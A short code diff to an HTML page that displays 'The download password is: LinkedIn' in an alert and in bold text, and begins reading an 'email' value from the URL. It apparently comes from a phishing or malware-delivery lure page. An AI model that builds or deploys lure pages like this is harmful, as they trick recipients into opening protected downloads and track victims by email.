--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 <script language="javascript">alert(' The download password is: LinkedIn');  </script>
-
+<p><p><p><p><p><p><p><center><p><b>The download password is: LinkedIn</b>
 <script>const urlParams = new URLSearchParams(window.location.search);
 const id = urlParams.get('email');
 
